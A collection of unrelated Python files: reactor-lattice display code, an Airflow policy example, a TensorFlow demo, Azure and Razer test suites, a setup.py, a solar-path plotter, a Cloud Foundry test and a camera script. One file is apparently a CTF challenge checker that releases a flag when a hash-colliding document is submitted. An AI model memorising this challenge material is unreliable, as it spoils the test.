xml_element.append(lattice_subelement)
def _repr_axial_slice(self, universes):
"""Return string representation for the given 2D group of universes.
The 'universes' argument should be a list of lists of universes where
each sub-list represents a single ring. The first list should be the
outer ring.
"""
# Find the largest universe ID and count the number of digits so we can
# properly pad the output string later.
largest_id = max([max([univ._id for univ in ring])
for ring in universes])
n_digits = len(str(largest_id))
pad = ' '*n_digits
id_form = '{: ^' + str(n_digits) + 'd}'
# Initialize the list for each row.
rows = [[] for i in range(1 + 4 * (self._num_rings-1))]
middle = 2 * (self._num_rings - 1)
# Start with the degenerate first ring.
universe = universes[-1][0]
rows[middle] = [id_form.format(universe._id)]
# Add universes one ring at a time.
for r in range(1, self._num_rings):
# r_prime increments down while r increments up.
r_prime = self._num_rings - 1 - r
theta = 0
y = middle + 2*r
# Climb down the top-right.
for i in range(r):
# Add the universe.
universe = universes[r_prime][theta]
rows[y].append(id_form.format(universe._id))
# Translate the indices.
y -= 1
theta += 1
# Climb down the right.
for i in range(r):
# Add the universe.
universe = universes[r_prime][theta]
rows[y].append(id_form.format(universe._id))
# Translate the indices.
y -= 2
theta += 1
# Climb down the bottom-right.
for i in range(r):
# Add the universe.
universe = universes[r_prime][theta]
rows[y].append(id_form.format(universe._id))
# Translate the indices.
y -= 1
theta += 1
# Climb up the bottom-left.
for i in range(r):
# Add the universe.
universe = universes[r_prime][theta]
rows[y].insert(0, id_form.format(universe._id))
# Translate the indices.
y += 1
theta += 1
# Climb up the left.
for i in range(r):
# Add the universe.
universe = universes[r_prime][theta]
rows[y].insert(0, id_form.format(universe._id))
# Translate the indices.
y += 2
theta += 1
# Climb up the top-left.
for i in range(r):
# Add the universe.
universe = universes[r_prime][theta]
rows[y].insert(0, id_form.format(universe._id))
# Translate the indices.
y += 1
theta += 1
# Flip the rows and join each row into a single string.
rows = [pad.join(x) for x in rows[::-1]]
# Pad the beginning of the rows so they line up properly.
for y in range(self._num_rings - 1):
rows[y] = (self._num_rings - 1 - y)*pad + rows[y]
rows[-1 - y] = (self._num_rings - 1 - y)*pad + rows[-1 - y]
for y in range(self._num_rings % 2, self._num_rings, 2):
rows[middle + y] = pad + rows[middle + y]
if y != 0:
rows[middle - y] = pad + rows[middle - y]
# Join the rows together and return the string.
universe_ids = '\n'.join(rows)
return universe_ids
@staticmethod
def show_indices(num_rings):
"""Return a diagram of the hexagonal lattice layout with indices.
This method can be used to show the proper indices to be used when
setting the :attr:`HexLattice.universes` property. For example, running
this method with num_rings=3 will return the following diagram::
(0, 0)
(0,11) (0, 1)
(0,10) (1, 0) (0, 2)
(1, 5) (1, 1)
(0, 9) (2, 0) (0, 3)
(1, 4) (1, 2)
(0, 8) (1, 3) (0, 4)
(0, 7) (0, 5)
(0, 6)
Parameters
----------
num_rings : int
Number of rings in the hexagonal lattice
Returns
-------
str
Diagram of the hexagonal lattice showing indices
"""
# Find the largest string and count the number of digits so we can
# properly pad the output string later
largest_index = 6*(num_rings - 1)
n_digits_index = len(str(largest_index))
n_digits_ring = len(str(num_rings - 1))
str_form = '({{:{}}},{{:{}}})'.format(n_digits_ring, n_digits_index)
pad = ' '*(n_digits_index + n_digits_ring + 3)
# Initialize the list for each row.
rows = [[] for i in range(1 + 4 * (num_rings-1))]
middle = 2 * (num_rings - 1)
# Start with the degenerate first ring.
rows[middle] = [str_form.format(num_rings - 1, 0)]
# Add universes one ring at a time.
for r in range(1, num_rings):
# r_prime increments down while r increments up.
r_prime = num_rings - 1 - r
theta = 0
y = middle + 2*r
for i in range(r):
# Climb down the top-right.
rows[y].append(str_form.format(r_prime, theta))
y -= 1
theta += 1
for i in range(r):
# Climb down the right.
rows[y].append(str_form.format(r_prime, theta))
y -= 2
theta += 1
for i in range(r):
# Climb down the bottom-right.
rows[y].append(str_form.format(r_prime, theta))
y -= 1
theta += 1
for i in range(r):
# Climb up the bottom-left.
rows[y].insert(0, str_form.format(r_prime, theta))
y += 1
theta += 1
for i in range(r):
# Climb up the left.
rows[y].insert(0, str_form.format(r_prime, theta))
y += 2
theta += 1
for i in range(r):
# Climb up the top-left.
rows[y].insert(0, str_form.format(r_prime, theta))
y += 1
theta += 1
# Flip the rows and join each row into a single string.
rows = [pad.join(x) for x in rows[::-1]]
# Pad the beginning of the rows so they line up properly.
for y in range(num_rings - 1):
rows[y] = (num_rings - 1 - y)*pad + rows[y]
rows[-1 - y] = (num_rings - 1 - y)*pad + rows[-1 - y]
for y in range(num_rings % 2, num_rings, 2):
rows[middle + y] = pad + rows[middle + y]
if y != 0:
rows[middle - y] = pad + rows[middle - y]
# Join the rows together and return the string.
return '\n'.join(rows)
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from typing import Callable, List
from airflow.configuration import conf
from airflow.exceptions import AirflowClusterPolicyViolation
from airflow.models.baseoperator import BaseOperator
# [START example_cluster_policy_rule]
def task_must_have_owners(task: BaseOperator):
if not task.owner or task.owner.lower() == conf.get('operators', 'default_owner'):
raise AirflowClusterPolicyViolation(
f'''Task must have non-None non-default owner. Current value: {task.owner}'''
)
# [END example_cluster_policy_rule]
# [START example_list_of_cluster_policy_rules]
TASK_RULES: List[Callable[[BaseOperator], None]] = [
task_must_have_owners,
]
def _check_task_rules(current_task: BaseOperator):
"""Check task rules for given task."""
notices = []
for rule in TASK_RULES:
try:
rule(current_task)
except AirflowClusterPolicyViolation as ex:
notices.append(str(ex))
if notices:
notices_list = " * " + "\n * ".join(notices)
raise AirflowClusterPolicyViolation(
f"DAG policy violation (DAG ID: {current_task.dag_id}, Path: {current_task.dag.filepath}):\n"
f"Notices:\n"
f"{notices_list}"
)
def cluster_policy(task: BaseOperator):
"""Ensure Tasks have non-default owners."""
_check_task_rules(task)
# [END example_list_of_cluster_policy_rules]
|
#-*- coding: utf-8 -*-
"""
#---------------------------------------------
filename: ex_runTFmatmul.py
- Construct a computational graph which calculate
a matrix multiplication in Tensorflow
- Use tf.constant() in a matrix form
Written by Jaewook Kang
2017 Aug.
#-------------------------------------------
"""
import tensorflow as tf
# computational TF graph construction ================================
# 1x2 형렬을 만드는 Constant 연산을 생성합니다.
# 이 연산자는 기본 그래프의 노드로 추가됩니다.
#
# 생성자에 의해 반환된 값(matrix1)은 Constant 연산의 출력을 나타냅니다.
matrix1 = tf.constant([[3., 3.]]) # 1 by 2
# 2x1 행렬을 만드는 또 다른 Constant를 생성합니다.
matrix2 = tf.constant([[2.],[2.]]) # 2 by 1
# 'matrix1'과 'matrix2'를 입력으로 받는 Matmul 연산을 생성합니다.
# 반환값인 'product'는 행렬을 곱한 결과를 나타냅니다.
product = tf.matmul(matrix1, matrix2)
# 계산 그래프로 세션을 생성==================
sess = tf.Session()
result = sess.run(product)
print(result)
# ==> [[ 12.]]
sess.close()
|
# coding: utf-8
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
from __future__ import division
from datetime import datetime
from dateutil.tz import tzutc
import uuid
from azure.core.credentials import AccessToken
from azure.core.exceptions import ResourceExistsError
from azure.data.tables import (
EntityProperty,
EdmType,
)
from azure.data.tables.aio import TableServiceClient
from azure.identity.aio import DefaultAzureCredential
from devtools_testutils import is_live
from .testcase import TableTestCase, SLEEP_DELAY
TEST_TABLE_PREFIX = "pytableasync"
class AsyncFakeTokenCredential(object):
"""Protocol for classes able to provide OAuth tokens.
:param str scopes: Lets you specify the type of access needed.
"""
def __init__(self):
self.token = AccessToken("YOU SHALL NOT PASS", 0)
async def get_token(self, *args):
return self.token
class AsyncTableTestCase(TableTestCase):
def get_token_credential(self):
if is_live():
return DefaultAzureCredential()
return self.generate_fake_token()
def generate_fake_token(self):
return AsyncFakeTokenCredential()
def _get_table_reference(self, prefix=TEST_TABLE_PREFIX):
table_name = self.get_resource_name(prefix)
return table_name
async def _create_table(self, ts, prefix=TEST_TABLE_PREFIX, table_list=None):
table_name = self._get_table_reference(prefix)
try:
table = await ts.create_table(table_name)
if table_list is not None:
table_list.append(table)
except ResourceExistsError:
table = ts.get_table_client(table_name)
return table
async def _delete_all_tables(self, account_name, key):
client = TableServiceClient(self.account_url(account_name, "cosmos"), credential=key)
async for table in client.list_tables():
await client.delete_table(table.name)
if self.is_live:
self.sleep(10)
async def _tear_down(self):
if is_live():
async for table in self.ts.list_tables():
await self.ts.delete_table(table.name)
self.test_tables = []
await self.ts.close()
async def _create_query_table(self, entity_count):
"""
Creates a table with the specified name and adds entities with the
default set of values. PartitionKey is set to 'MyPartition' and RowKey
is set to a unique counter value starting at 1 (as a string).
"""
table_name = self.get_resource_name("querytable")
table = await self.ts.create_table(table_name)
self.query_tables.append(table_name)
client = self.ts.get_table_client(table_name)
entity = self._create_random_entity_dict()
for i in range(1, entity_count + 1):
entity["RowKey"] = entity["RowKey"] + str(i)
await client.create_entity(entity=entity)
return client
async def _insert_two_opposite_entities(self, pk=None, rk=None):
entity1 = self._create_random_entity_dict()
resp = await self.table.create_entity(entity1)
partition, row = self._create_pk_rk(pk, rk)
properties = {
"PartitionKey": partition + u"1",
"RowKey": row + u"1",
"age": 49,
"sex": u"female",
"married": False,
"deceased": True,
"optional": None,
"ratio": 5.2,
"evenratio": 6.0,
"large": 39999011,
"Birthday": datetime(1993, 4, 1, tzinfo=tzutc()),
"birthday": datetime(1990, 4, 1, tzinfo=tzutc()),
"binary": b"binary-binary",
"other": EntityProperty(40, EdmType.INT32),
"clsid": uuid.UUID("c8da6455-213e-42d9-9b79-3f9149a57833"),
}
await self.table.create_entity(properties)
return entity1, resp
async def _insert_random_entity(self, pk=None, rk=None):
entity = self._create_random_entity_dict(pk, rk)
metadata = await self.table.create_entity(entity=entity)
return entity, metadata["etag"]
async def _set_up(self, account_name, credential, url="table"):
account_url = self.account_url(account_name, url)
self.ts = TableServiceClient(account_url, credential=credential)
self.table_name = self.get_resource_name("uttable")
self.table = self.ts.get_table_client(self.table_name)
if self.is_live:
try:
await self.ts.create_table(table_name=self.table_name)
except ResourceExistsError:
pass
self.query_tables = []
|
import multiprocessing
import os
import signal
import tempfile
import time
import unittest
import shutil
import razer.client
import razer_daemon.daemon
import razer._fake_driver as fake_driver
import coverage
def run_daemon(daemon_dir, driver_dir):
# TODO console_log false
razer_daemon.daemon.daemonize(foreground=True, verbose=True, console_log=False, run_dir=daemon_dir, pid_file=os.path.join(daemon_dir, 'razer-daemon.pid'), test_dir=driver_dir)
class DeviceManagerTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls._daemon_dir = tempfile.mkdtemp(prefix='tmp_', suffix='_daemondata')
cls._tmp_dir = tempfile.mkdtemp(prefix='tmp_', suffix='_daemontest')
cls._bw_serial = 'IO0000000000001'
cls._bw_chroma = fake_driver.FakeDevice('razerblackwidowchroma', serial=cls._bw_serial, tmp_dir=cls._tmp_dir)
print("Created BlackWidow Chroma endpoints")
cls._daemon_proc = multiprocessing.Process(target=run_daemon, args=(cls._daemon_dir, cls._tmp_dir))
cls._daemon_proc.start()
print("Started daemon")
time.sleep(5)
@classmethod
def tearDownClass(cls):
print("Stopping daemon")
os.kill(cls._daemon_proc.pid, signal.SIGINT)
time.sleep(3)
if cls._daemon_proc.is_alive():
print("Daemon still alive...")
time.sleep(8)
if cls._daemon_proc.is_alive():
cls._daemon_proc.terminate()
if cls._daemon_proc.is_alive():
print("Failed to kill daemon")
cls._bw_chroma.close()
shutil.rmtree(cls._tmp_dir)
shutil.rmtree(cls._daemon_dir)
time.sleep(5)
def setUp(self):
self._bw_chroma.create_endpoints()
self.device_manager = razer.client.DeviceManager()
def test_device_list(self):
self.assertEqual(len(self.device_manager.devices), 1)
def test_serial(self):
device = self.device_manager.devices[0]
self.assertEqual(device.serial, self._bw_chroma.get('get_serial'))
def test_name(self):
device = self.device_manager.devices[0]
self.assertEqual(device.name, self._bw_chroma.get('device_type'))
def test_type(self):
device = self.device_manager.devices[0]
self.assertEqual(device.type, 'keyboard')
def test_fw_version(self):
device = self.device_manager.devices[0]
self.assertEqual(device.firmware_version, self._bw_chroma.get('get_firmware_version'))
def test_brightness(self):
device = self.device_manager.devices[0]
# Test 100%
device.brightness = 100.0
self.assertEqual('255', self._bw_chroma.get('set_brightness'))
self.assertEqual(100.0, device.brightness)
device.brightness = 50.0
self.assertEqual('127', self._bw_chroma.get('set_brightness'))
self.assertAlmostEqual(50.0, device.brightness, delta=0.4)
device.brightness = 0.0
self.assertEqual('0', self._bw_chroma.get('set_brightness'))
self.assertEqual(0, device.brightness)
def test_capabilities(self):
device = self.device_manager.devices[0]
self.assertEqual(device.capabilities, device._capabilities)
def test_device_keyboard_game_mode(self):
device = self.device_manager.devices[0]
self._bw_chroma.set('mode_game', '1')
self.assertTrue(device.game_mode_led)
device.game_mode_led = False
self.assertEqual(self._bw_chroma.get('mode_game'), '0')
device.game_mode_led = True
self.assertEqual(self._bw_chroma.get('mode_game'), '1')
def test_device_keyboard_macro_mode(self):
device = self.device_manager.devices[0]
self._bw_chroma.set('mode_macro', '1')
self.assertTrue(device.macro_mode_led)
device.macro_mode_led = False
self.assertEqual(self._bw_chroma.get('mode_macro'), '0')
device.macro_mode_led = True
self.assertEqual(self._bw_chroma.get('mode_macro'), '1')
self._bw_chroma.set('mode_macro_effect', '0')
self.assertEqual(device.macro_mode_led_effect, razer.client.constants.MACRO_LED_STATIC)
device.macro_mode_led_effect = razer.client.constants.MACRO_LED_BLINK
self.assertEqual(self._bw_chroma.get('mode_macro'), str(razer.client.constants.MACRO_LED_BLINK))
def test_device_keyboard_effect_none(self):
device = self.device_manager.devices[0]
device.fx.none()
self.assertEqual(self._bw_chroma.get('mode_none'), '1')
def test_device_keyboard_effect_spectrum(self):
device = self.device_manager.devices[0]
device.fx.spectrum()
self.assertEqual(self._bw_chroma.get('mode_spectrum'), '1')
def test_device_keyboard_effect_wave(self):
device = self.device_manager.devices[0]
device.fx.wave(razer.client.constants.WAVE_LEFT)
self.assertEqual(self._bw_chroma.get('mode_wave'), str(razer.client.constants.WAVE_LEFT))
device.fx.wave(razer.client.constants.WAVE_RIGHT)
self.assertEqual(self._bw_chroma.get('mode_wave'), str(razer.client.constants.WAVE_RIGHT))
with self.assertRaises(ValueError):
device.fx.wave('lalala')
def test_device_keyboard_effect_static(self):
device = self.device_manager.devices[0]
device.fx.static(255, 0, 255)
self.assertEqual(b'\xFF\x00\xFF', self._bw_chroma.get('mode_static', binary=True))
for red, green, blue in ((256.0, 0, 0), (0, 256.0, 0), (0, 0, 256.0)):
with self.assertRaises(ValueError):
device.fx.static(red, green, blue)
device.fx.static(256, 0, 700)
self.assertEqual(b'\xFF\x00\xFF', self._bw_chroma.get('mode_static', binary=True))
def test_device_keyboard_effect_reactive(self):
device = self.device_manager.devices[0]
time = razer.client.constants.REACTIVE_500MS
device.fx.reactive(255, 0, 255, time)
self.assertEqual(b'\x01\xFF\x00\xFF', self._bw_chroma.get('mode_reactive', binary=True))
for red, green, blue in ((256.0, 0, 0), (0, 256.0, 0), (0, 0, 256.0)):
with self.assertRaises(ValueError):
device.fx.reactive(red, green, blue, time)
device.fx.reactive(256, 0, 700, time)
self.assertEqual(b'\x01\xFF\x00\xFF', self._bw_chroma.get('mode_reactive', binary=True))
with self.assertRaises(ValueError):
device.fx.reactive(255, 0, 255, 'lalala')
def test_device_keyboard_effect_breath_single(self):
device = self.device_manager.devices[0]
device.fx.breath_single(255, 0, 255)
self.assertEqual(b'\xFF\x00\xFF', self._bw_chroma.get('mode_breath', binary=True))
for red, green, blue in ((256.0, 0, 0), (0, 256.0, 0), (0, 0, 256.0)):
with self.assertRaises(ValueError):
device.fx.breath_single(red, green, blue)
device.fx.breath_single(256, 0, 700)
self.assertEqual(b'\xFF\x00\xFF', self._bw_chroma.get('mode_breath', binary=True))
def test_device_keyboard_effect_breath_dual(self):
device = self.device_manager.devices[0]
device.fx.breath_dual(255, 0, 255, 255, 0, 0)
self.assertEqual(b'\xFF\x00\xFF\xFF\x00\x00', self._bw_chroma.get('mode_breath', binary=True))
for r1, g1, b1, r2, g2, b2 in ((256.0, 0, 0, 0, 0, 0), (0, 256.0, 0, 0, 0, 0), (0, 0, 256.0, 0, 0, 0),
(0, 0, 0, 256.0, 0, 0), (0, 0, 0, 0, 256.0, 0), (0, 0, 0, 0, 0, 256.0)):
with self.assertRaises(ValueError):
device.fx.breath_dual(r1, g1, b1, r2, g2, b2)
device.fx.breath_dual(256, 0, 700, 255, 0, 0)
self.assertEqual(b'\xFF\x00\xFF\xFF\x00\x00', self._bw_chroma.get('mode_breath', binary=True))
def test_device_keyboard_effect_breath_random(self):
device = self.device_manager.devices[0]
device.fx.breath_random()
self.assertEqual(self._bw_chroma.get('mode_breath'), '1')
def test_device_keyboard_effect_ripple(self):
device = self.device_manager.devices[0]
refresh_rate = 0.01
device.fx.ripple(255, 0, 255, refresh_rate)
time.sleep(0.1)
custom_effect_payload = self._bw_chroma.get('set_key_row', binary=True)
self.assertGreater(len(custom_effect_payload), 1)
self.assertEqual(self._bw_chroma.get('mode_custom'), '1')
for red, green, blue in ((256.0, 0, 0), (0, 256.0, 0), (0, 0, 256.0)):
with self.assertRaises(ValueError):
device.fx.reactive(red, green, blue, refresh_rate)
with self.assertRaises(ValueError):
device.fx.reactive(255, 0, 255, 'lalala')
device.fx.none()
def test_device_keyboard_effect_random_ripple(self):
device = self.device_manager.devices[0]
refresh_rate = 0.01
device.fx.ripple_random(refresh_rate)
time.sleep(0.1)
custom_effect_payload = self._bw_chroma.get('set_key_row', binary=True)
self.assertGreater(len(custom_effect_payload), 1)
self.assertEqual(self._bw_chroma.get('mode_custom'), '1')
with self.assertRaises(ValueError):
device.fx.ripple_random('lalala')
device.fx.none()
def test_device_keyboard_effect_framebuffer(self):
device = self.device_manager.devices[0]
device.fx.advanced.matrix.set(0, 0, (255, 0, 255))
self.assertEqual(device.fx.advanced.matrix.get(0, 0), (255, 0, 255))
device.fx.advanced.draw()
custom_effect_payload = self._bw_chroma.get('set_key_row', binary=True)
self.assertEqual(custom_effect_payload[:4], b'\x00\xFF\x00\xFF')
device.fx.advanced.matrix.to_framebuffer() # Save 255, 0, 255
device.fx.advanced.matrix.reset() # Clear FB
device.fx.advanced.matrix.set(0, 0, (0, 255, 0))
device.fx.advanced.draw_fb_or() # Draw FB or'd with Matrix
custom_effect_payload = self._bw_chroma.get('set_key_row', binary=True)
self.assertEqual(custom_effect_payload[:4], b'\x00\xFF\xFF\xFF')
# Append that to FB
device.fx.advanced.matrix.to_framebuffer_or()
device.fx.advanced.draw()
custom_effect_payload = self._bw_chroma.get('set_key_row', binary=True)
binary = device.fx.advanced.matrix.to_binary()
self.assertEqual(binary, custom_effect_payload)
def test_device_keyboard_macro_enable(self):
device = self.device_manager.devices[0]
device.macro.enable_macros()
self.assertEqual(self._bw_chroma.get('macro_keys'), '1')
def test_device_keyboard_macro_add(self):
device = self.device_manager.devices[0]
url_macro = device.macro.create_url_macro_item('http://example.org')
device.macro.add_macro('M1', [url_macro])
macros = device.macro.get_macros()
self.assertIn('M1', macros)
with self.assertRaises(ValueError):
device.macro.add_macro('M6', url_macro) # Unknown key
with self.assertRaises(ValueError):
device.macro.add_macro('M1', 'lalala') # Not a sequnce
with self.assertRaises(ValueError):
device.macro.add_macro('M1', ['lalala']) # Bad element in sequence
def test_device_keyboard_macro_del(self):
device = self.device_manager.devices[0]
url_macro = device.macro.create_url_macro_item('http://example.org')
device.macro.add_macro('M2', [url_macro])
macros = device.macro.get_macros()
self.assertIn('M2', macros)
device.macro.del_macro('M2')
macros = device.macro.get_macros()
self.assertNotIn('M2', macros)
with self.assertRaises(ValueError):
device.macro.del_macro('M6') # Unknown key
|
# coding: utf-8
"""
Gene Feature Enumeration Service
The Gene Feature Enumeration (GFE) Submission service provides an API for converting raw sequence data to GFE. It provides both a RESTful API and a simple user interface for converting raw sequence data to GFE results. Sequences can be submitted one at a time or as a fasta file. This service uses <a href=\"https://github.com/nmdp-bioinformatics/service-feature\">nmdp-bioinformatics/service-feature</a> for encoding the raw sequence data and <a href=\"https://github.com/nmdp-bioinformatics/HSA\">nmdp-bioinformatics/HSA</a> for aligning the raw sequence data. The code is open source, and available on <a href=\"https://github.com/nmdp-bioinformatics/service-gfe-submission\">GitHub</a>.<br><br>Go to <a href=\"http://service-gfe-submission.readthedocs.io\">service-gfe-submission.readthedocs.io</a> for more information
OpenAPI spec version: 1.0.7
Contact: mhalagan@nmdp.org
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import sys
from setuptools import setup, find_packages
NAME = "swagger_client"
VERSION = "1.0.0"
# To install the library, run the following
#
# python setup.py install
#
# prerequisite: setuptools
# http://pypi.python.org/pypi/setuptools
REQUIRES = ["urllib3 >= 1.15", "six >= 1.10", "certifi", "python-dateutil"]
setup(
name=NAME,
version=VERSION,
description="Gene Feature Enumeration Service",
author_email="mhalagan@nmdp.org",
url="",
keywords=["Swagger", "Gene Feature Enumeration Service"],
install_requires=REQUIRES,
packages=find_packages(),
include_package_data=True,
long_description="""\
The Gene Feature Enumeration (GFE) Submission service provides an API for converting raw sequence data to GFE. It provides both a RESTful API and a simple user interface for converting raw sequence data to GFE results. Sequences can be submitted one at a time or as a fasta file. This service uses <a href=\"https://github.com/nmdp-bioinformatics/service-feature\">nmdp-bioinformatics/service-feature</a> for encoding the raw sequence data and <a href=\"https://github.com/nmdp-bioinformatics/HSA\">nmdp-bioinformatics/HSA</a> for aligning the raw sequence data. The code is open source, and available on <a href=\"https://github.com/nmdp-bioinformatics/service-gfe-submission\">GitHub</a>.<br><br>Go to <a href=\"http://service-gfe-submission.readthedocs.io\">service-gfe-submission.readthedocs.io</a> for more information
"""
)
|
from pysolar.solar import *
import numpy as np
import matplotlib.pyplot as plt
import datetime
latitude_deg = 45
# month, day, shift because of DST
dates_hour = [(12, 23, 1), (6, 22, 0)]
dates = [(12, 23), (1, 20), (2, 18), (3, 21), (4, 17), (5, 21), (6, 22)]
# dates = []
# for month in range(6):
# for day in range(27):
# dates.append((month + 1,day + 1))
# TODO : find how to use solar time instead of UTC time
# TODO : fix the dependance on hour rectification not to have the curve
# going backward (use tuples and reorganize them?)
def solar_path(latitude_deg, month, day, hour=3, step_hour=0.5, nb_step=48, plot='yes'):
"""computes and puts in the plot the azimuth and altitude of the sun for a specified latitude and a specified date.
By default, it will calculate the two values with a step of half an hour, starting at 3 a.m. and ending 24h later"""
longitude_deg = 0
d = datetime.datetime(2015, month, day, hour, 0, 0)
altitude = []
azimuth = []
delta = datetime.timedelta(hours=step_hour)
# not going through every hour to avoir the curve going backward
for i in range(nb_step):
timestamp = d
altitude_deg = get_altitude(latitude_deg, longitude_deg, d)
# taking off what is under the horizon
if altitude_deg < 0:
altitude_deg = 0
# work-around to have the 180° south convention
azimuth_deg = 180 - get_azimuth(latitude_deg, longitude_deg, d) % 360
if azimuth_deg < 0:
azimuth_deg = azimuth_deg + 360
altitude.append(format(altitude_deg, '.2f'))
azimuth.append(format(azimuth_deg, '.2f'))
d = d + delta
if plot == 'yes':
plt.plot(azimuth, altitude)
return(azimuth, altitude)
def hours_plot(latitude_deg, dates_hour):
"""plot the graph corresponding to similar values of hour"""
for h in range(23):
azimuth_at_h = []
altitude_at_h = []
for (month, day, shift) in dates_hour:
azimuth_at_h.append(solar_path(
latitude_deg, month, day, h - shift + 1, 0.5, 1, 'no')[0])
altitude_at_h.append(solar_path(
latitude_deg, month, day, h - shift + 1, 0.5, 1, 'no')[1])
plt.plot(azimuth_at_h, altitude_at_h)
# TODO : add legend to the plot (hours and date)
def plotter():
"""plot the solar diagram"""
plt.title('Solar zenith')
plt.xlabel('azimuth')
plt.ylabel('angle')
plt.axis([30, 330, 0, 90])
plt.grid(True)
# plt.locator_params(axis = 'x', nbins=40)
plt.xticks(range(30, 330, 10))
plt.yticks(range(0, 90, 5))
plt.show()
for (month, day) in dates:
solar_path(latitude_deg, month, day)
hours_plot(latitude_deg, dates_hour)
plotter()
|
#!/usr/bin/python
#
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This is the stdio program that verifies a submitted will. It reads the
submitted will from stdin. If the will is different than the original,
yet has the same hash digest, then we print a success message that includes the
CTF flag. Otherwise we print a failure message.
This program should be run once per submission. It exits after printing the
result message to stdout.
"""
import hasher
import json
import sys
with open("metadata.json", "r") as jsonFile, open("farnsworth_fry_will", "rb") as willFile:
print "Welcome to the will authenticity checker service."
print "Please provide the will from Professor Herbert J. Farnsworth:"
sys.stdout.flush()
data = json.load(jsonFile)
flag = data['challenge']['flag'].strip().encode()
originalWill = willFile.read()
originalHash = hasher.findDigest(originalWill)
newWill = sys.stdin.read(len(originalWill))
if newWill == originalWill:
print "The new will must be different than the original."
sys.exit(0)
newHash = hasher.findDigest(newWill)
if newHash != originalHash:
print "The new hash does not match the original."
print "The original hash is: %064x" % originalHash
print "The new hash is: %064x" % newHash
sys.exit(0)
print "Success! You, Bender the robot, inherit everything, and Fry gets nothing."
print "Among the professor's notes that you inherited, you found:"
print flag
|
import logging
import unittest
from config_test import build_client_from_configuration
_logger = logging.getLogger(__name__)
class TestNavigation(unittest.TestCase):
def test_all(self):
client = build_client_from_configuration()
for organization in client.v2.organizations:
if organization['metadata']['guid'] == client.org_guid:
for space in organization.spaces():
if space['metadata']['guid'] == client.space_guid:
organization_reloaded = space.organization()
self.assertEqual(organization['metadata']['guid'], organization_reloaded['metadata']['guid'])
for application in space.apps():
if application['metadata']['guid'] == client.app_guid:
space_reloaded = application.space()
self.assertEqual(space['metadata']['guid'], space_reloaded['metadata']['guid'])
application.start()
application.stats()
application.instances()
application.summary()
for _ in application.routes():
break
for _ in application.service_bindings():
break
for _ in application.events():
break
application.stop()
for service_instance in space.service_instances():
space_reloaded = service_instance.space()
self.assertEqual(space['metadata']['guid'], space_reloaded['metadata']['guid'])
for service_binding in service_instance.service_bindings():
service_instance_reloaded = service_binding.service_instance()
self.assertEqual(service_instance['metadata']['guid'],
service_instance_reloaded['metadata']['guid'])
service_binding.app()
break
for route in service_instance.routes():
service_instance_reloaded = route.service_instance()
self.assertEqual(service_instance['metadata']['guid'],
service_instance_reloaded['metadata']['guid'])
for _ in route.apps():
break
space_reloaded = route.space()
self.assertEqual(space['metadata']['guid'], space_reloaded['metadata']['guid'])
break
service_plan = service_instance.service_plan()
for _ in service_plan.service_instances():
break
service = service_plan.service()
for _ in service.service_plans():
break
break
|
#!/usr/bin/python
import time
import os
import sys
import pygame
import numpy
from PIL import Image, ImageDraw, ImageChops
print("")
print("")
print(" USE l=3 to take a photo every 3 somethings, try a 1000 or 2")
print(" t to take triggered photos ")
print(" cap=/home/pi/folder/ to set caps path other than current dir")
print(" ")
pi_paper = False #updates pi wall paper, use -nopaper to turn it off.
s_val = "10"
c_val = "2"
g_val = "10"
b_val = "15"
x_dim = 1600
y_dim = 896
additonal_commands = "-d/dev/video1 -w"
try:
cappath = os.getcwd()
cappath += "/"
except:
print(" COULD NOT GET CURRENT DIR SET WITH A FLAG ")
cappath = "./"
print(" COULD NOT GET CURRENT DIR SET WITH A FLAG ")
loc_settings = "./camera_settings.txt"
try:
with open(loc_settings, "r") as f:
for line in f:
s_item = line.split("=")
if s_item[0] == "s_val":
s_val = s_item[1].split("\n")[0]
elif s_item[0] == "c_val":
c_val = s_item[1].split("\n")[0]
elif s_item[0] == "g_val":
g_val = s_item[1].split("\n")[0]
elif s_item[0] == "b_val":
b_val = s_item[1].split("\n")[0]
elif s_item[0] == "x_dim":
x_dim = s_item[1].split("\n")[0]
elif s_item[0] == "y_dim":
y_dim = s_item[1].split("\n")[0]
elif s_item[0] == "additonal_commands":
additonal_commands = s_item[1].split("\n")[0]
except:
print("No config file for camera, using default")
print("Run cam_config.py to create one")
def photo():
# take and save photo
timenow = time.time()
timenow = str(timenow)[0:10]
filename= "cap_"+str(timenow)+".jpg"
#os.system("uvccapture "+additonal_commands+" -S"+s_val+" -C" + c_val + " -G"+ g_val +" -B"+ b_val +" -x"+str(x_dim)+" -y"+str(y_dim)+" -v -t0 -o"+cappath+filename)
cmd = str("uvccapture "+additonal_commands+" -x"+str(x_dim)+" -y"+str(y_dim)+" -v -t0 -o"+cappath+filename)
print("####")
print("####")
print cmd
print("####")
print("####")
os.system(cmd)
print("Image taken and saved to "+cappath+filename)
if pi_paper == True:
os.system("export DISPLAY=:0 && pcmanfm --set-wallpaper "+cappath+filename)
return filename
if 'wp' in sys.argv or 'wallpaper' in sys.argv:
pi_paper = True
print(" Going to try changing wall paper")
loop = False
trig = False
for argu in sys.argv[1:]:
try:
thearg = str(argu).split('=')[0]
except:
thearg = str(argu)
if thearg == 'cap' or thearg =='cappath':
cappath = str(argu).split('=')[1]
elif thearg == 'l' or thearg == 'looped':
try:
num = int(str(argu).split('=')[1])
except:
print("No speed supplied, taking every 10")
num = 10
loop = True
elif thearg == 't' or thearg == 'TRIGGERED':
trig = True
print(" Saving files to, " + str(cappath))
pygame.init()
